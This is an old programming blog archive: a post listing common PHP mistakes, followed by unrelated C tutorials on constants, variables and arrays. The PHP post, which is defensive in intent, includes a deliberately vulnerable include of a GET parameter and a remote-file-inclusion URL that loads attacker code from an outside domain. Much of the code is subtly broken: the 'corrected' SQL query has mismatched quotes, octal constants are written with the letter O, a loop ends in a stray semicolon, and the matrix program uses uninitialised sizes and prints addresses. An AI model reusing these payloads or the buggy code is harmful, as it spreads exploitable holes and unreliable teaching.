Saturday, September 8, 2007

Top 10 mistakes made repeatedly by PHP programmers.

Here goes the top 10 errors made by PHP programmers.

1. Not escaping entities

It's basic knowledge; ALL untrusted input (especially user input from forms) has to be sanitized before it is being output.

echo $_GET['username'];


Can for instance output:

It is an apparent security risk not to sanitize untrusted data before output. Besides you might end up with pages looking very messy if you do not thread user input the right way.


How to fix it:

Basically you need to convert < , >, ' and " to their proper entities (< , >
' , and ") . The functions htmlspecialchars and htmlentities() do the work.

So here is the right way:

echo htmlspecialchars($_GET['username'], ENT_QUOTES);

Uncountable scripts carries this problem.

2. Not Escaping SQL input

When querying your database all ways make sure untrusted data gets escaped else your application will be vulnerable to SQL-injections and unreliable, some coders think that they have covered their asses by having magic_quotes on in their php.ini. The problem is that untrusted input can come from other sources than $_GET, $_POST and $_COOKIE (crawling other websites or using input from the database). And what happens if magic_quotes suddenly is set to OFF?

How to fix it:
I recommend setting magic_quotes to off in php.ini or by using .htaccess and then using mysql_real_escape_string() on all variables used in SQL-expressions.


$sql = "UPDATE users SET
name='.mysql_real_escape_string($name).'
WHERE id='.mysql_real_escape_string ($id).'";
mysql_query($sql);
?>

In PHP5 combined with mysql5 you can also use bindings.

If you leave magic_quotes On you will just have to trust your instinct.

3. Wrong use of HTTP-header related functions: header(), session_start(), setcookie()

Have you ever encountered this warning? "warning: Cannot add header information - headers already sent [....]

Most likely you have either during development or when deploying PHP applications. When your browser downloads a web page the data response from the server is structured in two different parts: The header part and the content part.

The header consist of not visible data such as cookies to be set or if the browser should redirect to another location. The header always comes first.

The content part consists of the visible content HTML, image data and so on.

If output_buffering is set to Off in php.ini your. When the script outputs during execution all header related functions (setcookie(), header(), session_start()) must be called before any output. The problem is when somebody develops on one platform configuration and deploys to another platform configuration, then redirects stops working, cookies and sessions are not being stored...

How to fix it:
The right way is actually very simple make your script call all header related functions before you start any output and set output_buffering = Off in php.ini (at your development platform). If this is a problem on existing scripts you can all ways hack about with the output control functions.

4. Requiring and including files using untrusted data

Again and again do not trust data you do not declare implicitly: Including and requiring files from but not limited to $_GET, $_POST and $_COOKIE is a stupid and mortal path, you want to control which exacts code your server executes.

Example:
index.php

//including header, config, database connection, etc
include($_GET['filename']);
//including footer
?>

Any hacker can now request following URL: http://www.yourdomain.com/index.php?filename=anyfile.txt

By doing so the hacker can extract confidential information and execute PHP scripts stored on the server. Now if allow_url_fopen is set to On in your PHP.ini you will be doomed:

Try this one out:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

Then your script include and parse any code which the web page on
http://www.youaredoomed.com/phphack.php outputs. Doing so he can for instance send spam mails, change passwords, delete files.... I have a very limited imagination.

How to fix it:
You have to control which files the script is allowed to include and which it is not allowed to include.


Note: This is only a quick fix:


//Include only files that are allowed.
$allowedFiles = array('file1.txt','file2.txt','file3.txt');
if(in_array((string)$_GET['filename'],$allowedFiles)) {
include($_GET['filename']);
}
else{
exit('not allowed');
}
?>



5. Syntax errors

This covers all the parse and syntax errors YOU make during development, these are probably uncountable, right? Usually it is a bracket, semi-colon, quotation mark or parenthesis that is missing or placed wrong it is a time eater and that is why I have put it on the list. There is only one way to fight it: Become aware of which syntax errors you make and find ways to avoid repeating them! Of course a good text editor will help you a lot here please, do not use notepad.

6. No or little use of Object Orientation

Too many systems I have seen and been working with have this problem. They simply do not have any object orientation. Yes object and classes for a beginner are abstract but if for instance you build a shop system and you are not being object orientated, then the source code will become unmaintainable with time and size. PHP has been supporting basic object orientation since PHP4 and since PHP5 a lot more and a lot better, so get your ass on to using it.

7. Not using a framework

95% of all development with PHP is about developing the same four things: Create, edit, list and delete. To do all this in pure PHP without using a PHP MVC Framework of some kind (let it be home made or open source) is just plain stupid and a waste of YOUR time (of course there are exceptions and you can have good explanation on why you don't use a framework).

I talk out of experience and there is so much PHP out there but so little use of frameworks. Get your fingers dirty now.

8. Not knowing about existing functionality

One of the strong things about PHP is that there's so much functionality available in the PHP core but also in the pure PHP extensions. However time again and again scripts people are inventing the deep plate. I am guilty in doing this, but it is waste of time where you should be saving your time. Even when PHP functionality is out of question you can in a lot of situations save yourself time by using exec() to execute from shell.

Save yourself time searching the manual on www.php.net and Google, keep yourself updated on new features in future releases and by ask the right people when needed.


9. Using old PHP versions

This problem primarily relates to people developing on PHP4 to put it short you are developing on a deprecating platform and not using the full potential of your knowledge move on, there's a lot of good stuff and functionality in PHP5. And it is really not a big deal to change to PHP5 most applications only need a few moderations or no moderations to cope with the change.

Secondary there is the security risk of running on old and unpatched software it might end up damaging your applications.

According to Damien Seguy (founder of the French PHP portal http://www.nexen.net) 12% of all PHP servers where running PHP5 by the start of November 2006.

Read the article here (French).

So if you are developing PHP you are most likely (88%) still doing it on PHP4, shame on you!


10. Double escaping quotes

Have you ever seen a web page display a text with \' or \" , it usually happens when a script is made for magic_quotes of (php.ini) and is deployed on a site with magic_quotes on. First PHP runs addslashes() on all GET, POST and COOKIE data then afterwards one more time when the data is being stored.

Original text:
It's a string

After magic quotes on script start:
It\'s a string

On query storage:
It\\'s a string

HTML output:
It\'s a string


Another scenario that makes this occur is when a user tries to sign up and inputs invalid data, the user then get presented to the same form, this time with the input escaped, the second time the user posts with the valid data the input is escaped another time.

This stuff still happens way too much however mostly new and inexperienced people encounter this.

Wednesday, September 5, 2007

C Programming Language - Constants and Variables

C Programming Language - Constants and Variables

In this tutorial you will learn about Character Set, C Character-Set Table, Special Characters, White Space, Keywords and Identifiers, Constants, Integer Constants, Decimal Integers, Octal Integers, Hexadecimal integer, Real Constants, Single Character Constants, String Constants, Backslash Character Constants [Escape Sequences] and Variables.

Instructions in C language are formed using syntax and keywords. It is necessary to strictly follow C language Syntax rules. Any instructions that mis-matches with C language Syntax generates an error while compiling the program. All programs must confirm to rules pre-defined in C Language. Keywords as special words which are exclusively used by C language, each keyword has its own meaning and relevance hence, Keywords should not be used either as Variable or Constant names.

Character Set

The character set in C Language can be grouped into the following categories.

1. Letters
2. Digits
3. Special Characters
4. White Spaces

White Spaces are ignored by the compiler until they are a part of string constant. White Space may be used to separate words, but are strictly prohibited while using between characters of keywords or identifiers.

C Character-Set Table

Letters

Digits

Upper Case A to Z

0 to 9

Lower Case a to z

.

Special Characters

,

.Comma

&

.Ampersand

.

.Period

^

.Caret

;

.Semicolon

*

.Asterisk

:

.Colon

-

.Minus Sign

?

.Question Mark

+

.Plus Sign

'

.Aphostrophe

<

.Opening Angle (Less than sign)

"

.Quotation Marks

>

.Closing Angle (Greater than sign)

!

.Exclaimation Mark

(

.Left Parenthesis

|

.Vertical Bar

)

.Right Parenthesis

/

.Slash

[

.Left Bracket

\

.Backslash

]

.Right Bracket

~

.Tilde

{

.Left Brace

-

.Underscore

}

.Right Bracket

$

.Dollar Sign

#

.Number Sign

%

.Percentage Sign . .

.

.
.
White Space

1. Blank Space
2. Horizontal Tab
3. Carriage Return
4. New Line
5. Form Feed

Keywords and Identifiers

Every word in C language is a keyword or an identifier. Keywords in C language cannot be used as a variable name. They are specifically used by the compiler for its own purpose and they serve as building blocks of a c program.

The following are the Keyword set of C language.

.auto .else .register .union
.break .enum .return .unsigned
.case .extern .short .void
.char .float .signed .volatile
.const .for .size of .while
.continue .goto .static .
.default .if .struct .
.do .int .switch .
.double .long .typedef .

some compilers may have additional keywords listed in C manual.

Identifiers refers to the name of user-defined variables, array and functions. A variable should be essentially a sequence of letters and or digits and the variable name should begin with a character.

Both uppercase and lowercase letters are permitted. The underscore character is also permitted in identifiers.


The identifiers must conform to the following rules.

1. First character must be an alphabet (or underscore)
2. Identifier names must consists of only letters, digits and underscore.
3. A identifier name should have less than 31 characters.
4. Any standard C language keyword cannot be used as a variable name.
5. A identifier should not contain a space.

Constants

A constant value is the one which does not change during the execution of a program. C supports several types of constants.

1. Integer Constants
2. Real Constants
3. Single Character Constants
4. String Constants

Integer Constants

An integer constant is a sequence of digits. There are 3 types of integers namely decimal integer, octal integers and hexadecimal integer.

Decimal Integers consists of a set of digits 0 to 9 preceded by an optional + or - sign. Spaces, commas and non digit characters are not permitted between digits. Example for valid decimal integer constants are

123
-31
0
562321
+ 78

Some examples for invalid integer constants are

15 750
20,000
Rs. 1000

Octal Integers constant consists of any combination of digits from 0 through 7 with a O at the beginning. Some examples of octal integers are

O26
O
O347
O676

Hexadecimal integer constant is preceded by OX or Ox, they may contain alphabets from A to F or a to f. The alphabets A to F refers to 10 to 15 in decimal digits. Example of valid hexadecimal integers are

OX2
OX8C
OXbcd
Ox

Real Constants

Real Constants consists of a fractional part in their representation. Integer constants are inadequate to represent quantities that vary continuously. These quantities are represented by numbers containing fractional parts like 26.082. Example of real constants are

0.0026
-0.97
435.29
+487.0

Real Numbers can also be represented by exponential notation. The general form for exponential notation is mantissa exponent. The mantissa is either a real number expressed in decimal notation or an integer. The exponent is an integer number with an optional plus or minus sign.

A Single Character constant represent a single character which is enclosed in a pair of quotation symbols.

Example for character constants are

'5'
'x'
';'
' '

All character constants have an equivalent integer value which are called ASCII Values.

String Constants

A string constant is a set of characters enclosed in double quotation marks. The characters in a string constant sequence may be a alphabet, number, special character and blank space. Example of string constants are

"VISHAL"
"1234"
"God Bless"
"!.....?"

Backslash Character Constants [Escape Sequences]

Backslash character constants are special characters used in output functions. Although they contain two characters they represent only one character. Given below is the table of escape sequence and their meanings.

Constant

Meaning

'\a'

.Audible Alert (Bell)

'\b'

.Backspace

'\f'

.Formfeed

'\n'

.New Line

'\r'

.Carriage Return

'\t'

.Horizontal tab

'\v'

.Vertical Tab

'\''

.Single Quote

'\"'

.Double Quote

'\?'

.Question Mark

'\\'

.Back Slash

'\0'

.Null

Variables

A variable is a value that can change any time. It is a memory location used to store a data value. A variable name should be carefully chosen by the programmer so that its use is reflected in a useful way in the entire program. Variable names are case sensitive. Example of variable names are

Sun
number
Salary
Emp_name
average1

Any variable declared in a program should confirm to the following

1. They must always begin with a letter, although some systems permit underscore as the first character.
2. The length of a variable must not be more than 8 characters.
3. White space is not allowed and
4. A variable should not be a Keyword
5. It should not contain any special characters.

Examples of Invalid Variable names are

123
(area)
6th
%abc

C programming Basics

C Programming Language - An Overview

In this tutorial you will learn about C Programming Lanuage, Overview of C, Sample program - Printing a message, Executing a C Program and Basic structure of C programs

Overview of C

C is a programming language. It is most popular computer language today because it is a structured high level, machine independent language. Programmers need not worry about the hardware platform where they will be implemented.

Dennis Ritchie invented C language. Ken Thompson created a language which was based upon a language known as BCPL and it was called as B. B language was created in 1970, basically for unix operating system Dennis Ritchie used ALGOL, BCPL and B as the basic reference language from which he created C.

C has many qualities which any programmer may desire. It contains the capability of assembly language with the features of high level language which can be used for creating software packages, system software etc. It supports the programmer with a rich set of built-in functions and operators. C is highly portable. C programs written on one computer can run on other computer without making any changes in the program. Structured programming concept is well supported in C, this helps in dividing the programs into function modules or code blocks.

Sample program-1
Printing a message
Consider the following message

.
#include
main()
{
...../* Printing begins here */
.....printf (“C is a very good programming language.”);
...../* Printing ends here */
}

.

The first line is a preprocessor command which adds the stdio header file into our program. Actually stdio stands for standard input out, this header file supports the input-output functions in a program.

In a program, we need to provide input data and display processed data on standard output – Screen. The stdio.h header file supports these two activities. There are many header files which will be discussed in future.

The second line main() tell the compiler that it is the starting point of the program, every program should essentially have the main function only once in the program. The opening and closing braces indicates the beginning and ending of the program. All the statements between these two braces form the function body. These statements are actually the C code which tells the computer to do something. Each statement is a instruction for the computer to perform specific task.

The /* .... */ is a comment and will not be executed, the compiler simply ignores this statement. These are essential since it enhances the readability and understandability of the program. It is a very good practice to include comments in all the programs to make the users understand what is being done in the program.

The next statement printf() statement is the only executable line in the above sample program. The printf() function is a standard inbuild function for printing a given line which appears inside the double quotes. Therefore in the standard output device we can see the following line

C is a very good programming language.

The next line is again a comment statement as explained earlier. The closing brace indicates the end of the program.


======================================

Executing a C Program

The following basic steps is carried out in executing a C Program.

1. Type the C lanuage program.

2. Store the program by giving a suitable name and following it with an extension .c

3. Compile the program

4. Debug the errors if any, that is displayed during compile.

5. Run the program.
Basic structure of C programs



.....Documentation Section
.....

.....Link Section
.....

.....Definition Section
.....

.....Global declaration Section
.....

.....main() function section
.....{
..........Declaration Section
.....

..........Executable Section
.....}


.....Sub-program Section


.....function1
.....{
..........Statements
.....}


.....function2
.....{
..........Statements
.....}


.....function3
.....{
..........Statements
.....}



.

The documentation section consists of a set of comment lines giving the name of the program, the author and other details such as a short description of the purpose of the program.

The link section provides instructions to the compiler to link functions from the system library.

The definition section defines all the symbolic constants. The variables can be declared inside the main function or before the main function.

Declaring the variables before the main function makes the variables accessible to all the functions in a C language program, such variables are called Global Variables.

Declaring the variables within main function makes the usage of the variables confined to the main function only and it is not accessible outside the main function.

Every C program must have one main function. Enclosed in the main function is the declaration and executable parts.

In the declaration part we have all the variables.

There is atleast one statement in the executable part.

The two parts must appear between the opening and closing braces

The sub-program section contains all the user-defined functions that are called in the main function.

User-defined functions are generally placed immediately after the main function although they may appear in any order.

C Programming - Arrays

In this tutorial you will learn about C Programming - Arrays - Declaration of arrays, Initialization of arrays, Multi dimensional Arrays, Elements of multi dimension arrays and Initialization of multidimensional arrays.

The C language provides a capability that enables the user to define a set of ordered data items known as an array.

Suppose we had a set of grades that we wished to read into the computer and suppose we wished to perform some operations on these grades, we will quickly realize that we cannot perform such an operation until each and every grade has been entered since it would be quite a tedious task to declare each and every student grade as a variable especially since there may be a very large number.

In C we can define variable called grades, which represents not a single value of grade but a entire set of grades. Each element of the set can then be referenced by means of a number called as index number or subscript.

Declaration of arrays:

Like any other variable arrays must be declared before they are used. The general form of declaration is:

type variable-name[50];

The type specifies the type of the elements that will be contained in the array, such as int float or char and the size indicates the maximum number of elements that can be stored inside the array for ex:

float height[50];

Declares the height to be an array containing 50 real elements. Any subscripts 0 to 49 are valid. In C the array elements index or subscript begins with number zero. So height [0] refers to the first element of the array. (For this reason, it is easier to think of it as referring to element number zero, rather than as referring to the first element).

As individual array element can be used anywhere that a normal variable with a statement such as

G = grade [50];

The statement assigns the value stored in the 50th index of the array to the variable g.
More generally if I is declared to be an integer variable, then the statement g=grades [I];
Will take the value contained in the element number I of the grades array to assign it to g. so if I were equal to 7 when the above statement is executed, then the value of grades [7] would get assigned to g.

A value stored into an element in the array simply by specifying the array element on the left hand side of the equals sign. In the statement

grades [100]=95;

The value 95 is stored into the element number 100 of the grades array.
The ability to represent a collection of related data items by a single array enables us to develop concise and efficient programs. For example we can very easily sequence through the elements in the array by varying the value of the variable that is used as a subscript into the array. So the for loop

for(i=0;i < 100;++i);
sum = sum + grades [i];

Will sequence through the first 100 elements of the array grades (elements 0 to 99) and will add the values of each grade into sum. When the for loop is finished, the variable sum will then contain the total of first 100 values of the grades array (Assuming sum were set to zero before the loop was entered)

In addition to integer constants, integer valued expressions can also be inside the brackets to reference a particular element of the array. So if low and high were defined as integer variables, then the statement

next_value=sorted_data[(low+high)/2]; would assign to the variable next_value indexed by evaluating the expression (low+high)/2. If low is equal to 1 and high were equal to 9, then the value of sorted_data[5] would be assigned to the next_value and if low were equal to 1 and high were equal to 10 then the value of sorted_data[5] would also be referenced.

Just as variables arrays must also be declared before they are used. The declaration of an array involves the type of the element that will be contained in the array such as int, float, char as well as maximum number of elements that will be stored inside the array. The C system needs this latter information in order to determine how much memory space to reserve for the particular array.

The declaration int values[10]; would reserve enough space for an array called values that could hold up to 10 integers. Refer to the below given picture to conceptualize the reserved storage space.

values[0]


values[1]


values[2]


values[3]


values[4]


values[5]


values[6]


values[7]


values[8]


values[9]

The array values stored in the memory.

Initialization of arrays:

We can initialize the elements in the array in the same way as the ordinary variables when they are declared. The general form of initialization off arrays is:

type array_name[size]={list of values};

The values in the list care separated by commas, for example the statement

int number[3]={0,0,0};

Will declare the array size as a array of size 3 and will assign zero to each element if the number of values in the list is less than the number of elements, then only that many elements are initialized. The remaining elements will be set to zero automatically.

In the declaration of an array the size may be omitted, in such cases the compiler allocates enough space for all initialized elements. For example the statement

int counter[]={1,1,1,1};

Will declare the array to contain four elements with initial values 1. this approach works fine as long as we initialize every element in the array.

The initialization of arrays in c suffers two draw backs
1. There is no convenient way to initialize only selected elements.
2. There is no shortcut method to initialize large number of elements.

/* Program to count the no of positive and negative numbers*/
#include<>
void main( )
{
int a[50],n,count_neg=0,count_pos=0,I;
printf(“Enter the size of the array\n”);
scanf(“%d”,&n);
printf(“Enter the elements of the array\n”);
for I=0;I < n;I++)
scanf(“%d”,&a[I]);
for(I=0;I < n;I++)
{
if(a[I] < 0)
count_neg++;
else
count_pos++;
}
printf(“There are %d negative numbers in the array\n”,count_neg);
printf(“There are %d positive numbers in the array\n”,count_pos);
}

Multi dimensional Arrays:

Often there is a need to store and manipulate two dimensional data structure such as matrices & tables. Here the array has two subscripts. One subscript denotes the row & the other the column.
The declaration of two dimension arrays is as follows:

data_type array_name[row_size][column_size];
int m[10][20]

Here m is declared as a matrix having 10 rows( numbered from 0 to 9) and 20 columns(numbered 0 through 19). The first element of the matrix is m[0][0] and the last row last column is m[9][19]

Elements of multi dimension arrays:

A 2 dimensional array marks [4][3] is shown below figure. The first element is given by marks [0][0] contains 35.5 & second element is marks [0][1] and contains 40.5 and so on.

marks [0][0]
35.5

Marks [0][1]
40.5

Marks [0][2]
45.5

marks [1][0]
50.5

Marks [1][1]
55.5

Marks [1][2]
60.5

marks [2][0]

Marks [2][1]

Marks [2][2]

marks [3][0]

Marks [3][1]

Marks [3][2]

Initialization of multidimensional arrays:

Like the one dimension arrays, 2 dimension arrays may be initialized by following their declaration with a list of initial values enclosed in braces

Example:

int table[2][3]={0,0,01,1,1};

Initializes the elements of first row to zero and second row to 1. The initialization is done row by row. The above statement can be equivalently written as

int table[2][3]={{0,0,0},{1,1,1}}

By surrounding the elements of each row by braces.

C allows arrays of three or more dimensions. The compiler determines the maximum number of dimension. The general form of a multidimensional array declaration is:

date_type array_name[s1][s2][s3]…..[sn];

Where s is the size of the ith dimension. Some examples are:

int survey[3][5][12];
float table[5][4][5][3];

Survey is a 3 dimensional array declared to contain 180 integer elements. Similarly table is a four dimensional array containing 300 elements of floating point type.

/* example program to add two matrices & store the results in the 3rd matrix */
#include<>
#include<>
void main()
{
int a[10][10],b[10][10],c[10][10],i,j,m,n,p,q;
clrscr();
printf(“enter the order of the matrix\n”);
scanf(“%d%d”,&p,&q);
if(m==p && n==q)
{
printf(“matrix can be added\n”);
printf(“enter the elements of the matrix a”);
for(i=0;i < m;i++)
for(j=0;j < n;j++)
scanf(“%d”,&a[i][j]);
printf(“enter the elements of the matrix b”);
for(i=0;i < p;i++)
for(j=0;j < q;j++)
scanf(“%d”,&b[i][j]);
printf(“the sum of the matrix a and b is”);
for(i=0;i < m;i++)
for(j=0;j < n;j++)
c[i][j]=a[i][j]+b[i][j];
for(i=0;i < m;i++)
{
for(j=0;j < n;j++)
printf(“%d\t”,&a[i][j]);
printf(“\n”);
}
}